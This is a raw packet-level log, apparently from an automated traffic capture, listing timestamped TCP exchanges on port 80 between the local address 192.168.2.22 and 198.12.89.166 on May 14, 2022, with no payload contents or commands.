May 14, 2022 15:10:56.223681927 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.223687887 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.223712921 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.223715067 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.223723888 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.223737955 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.223746061 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.223762989 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.223779917 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.223818064 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.227658987 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.227725983 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.227741957 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.227802992 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.227816105 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.227830887 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.227847099 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.227854013 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.227864027 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.227866888 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.227900982 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.227901936 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.227955103 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.227961063 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.227998018 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228024006 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228024006 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228033066 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228069067 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228070974 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228104115 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228110075 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228144884 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228190899 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228239059 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228240013 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228280067 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228281021 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228322029 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228323936 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228372097 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228374004 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228410959 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228415966 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228449106 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228491068 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228533030 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228564024 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228622913 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228684902 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228735924 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228738070 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228745937 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228749990 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228779078 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228786945 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228809118 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228822947 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228830099 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228854895 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228857040 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228867054 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228888988 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228892088 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228919029 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228944063 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228949070 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228955030 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.228979111 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.228981972 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229007006 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229020119 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229041100 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229105949 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229147911 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229156017 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229195118 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229239941 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229279995 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229368925 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229401112 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229408026 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229430914 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229439974 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229461908 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229463100 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229495049 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229496956 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229525089 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229528904 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229557991 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229558945 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229594946 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229619980 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229651928 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229661942 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229684114 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229686975 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229716063 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229718924 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229746103 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229753971 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229777098 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229779005 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229809046 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229809999 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229840994 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229846001 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229871988 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229875088 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229903936 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229904890 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229937077 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229938984 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229965925 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.229969978 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.229998112 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230000019 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230030060 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230036974 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230063915 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230066061 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230091095 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230097055 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230098009 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230129004 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230133057 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230159998 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230164051 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230190992 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230199099 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230221987 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230226040 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230253935 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230268002 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230284929 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230288982 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230317116 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230321884 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230348110 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230353117 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230379105 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230382919 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230410099 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230413914 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230443954 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230449915 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230473995 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230479002 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230504990 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230509996 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230535984 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230542898 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230571032 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230575085 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230602980 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230608940 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230633974 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230640888 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230667114 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230669022 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230700016 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230703115 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230731964 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230739117 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230762959 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230767965 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230794907 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230799913 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230829000 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230834007 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230859995 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230865002 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230891943 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230899096 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230921984 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230946064 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230952978 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230958939 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.230983019 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.230989933 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231015921 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231026888 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231046915 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231051922 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231079102 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231081963 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231111050 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231123924 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231142044 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231147051 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231173992 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231179953 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231204033 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231218100 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231234074 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231240988 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231266975 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231271029 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231298923 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231307983 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231331110 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231336117 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231364965 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231367111 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231396914 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231406927 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231429100 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231431961 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231461048 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231463909 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231492996 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231501102 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231524944 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231532097 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231556892 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231558084 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231590033 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231602907 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231621981 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231626034 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231652975 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231658936 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231683969 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231693983 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231717110 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231719971 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231750011 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231751919 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231781006 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231791019 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231811047 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.231816053 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.231847048 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.253036976 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.254050016 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.321907043 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.321934938 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.321953058 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.321969986 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.321994066 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322010994 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322025061 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322037935 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322055101 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322060108 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322072029 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322092056 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322093964 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322104931 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322108984 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322118998 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322137117 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322144032 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322155952 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322173119 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322174072 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322191000 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322195053 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322211981 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322226048 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322230101 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322232962 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322243929 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322248936 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322262049 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322268009 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322278976 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322285891 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322295904 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322304010 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322312117 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322323084 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322331905 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322340965 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322349072 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322359085 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322365046 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322377920 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322396040 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322401047 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322407007 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322413921 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322427988 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322432995 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322442055 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322451115 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322460890 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322468042 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322483063 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322485924 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322490931 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322504997 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322521925 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322531939 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322539091 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322546959 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322565079 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322566986 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322583914 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322593927 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322602034 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322619915 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322637081 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322648048 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322660923 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322665930 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322679043 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322685003 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322695017 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322701931 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322720051 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322725058 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322736025 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322741032 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322753906 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322758913 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322771072 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322777033 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322794914 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322794914 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322810888 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322813034 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322828054 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322833061 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322845936 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322850943 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322870016 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322873116 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322886944 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322891951 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322905064 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322905064 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322922945 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322923899 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322937965 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322942019 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322953939 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322959900 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322972059 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322981119 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.322993994 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.322999954 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.323010921 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.323018074 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.323035955 CEST	80	49173	198.12.89.166	192.168.2.22
May 14, 2022 15:10:56.323038101 CEST	49173	80	192.168.2.22	198.12.89.166
May 14, 2022 15:10:56.323052883 CEST	80	49173	198.12.89.166	192.168.2.22
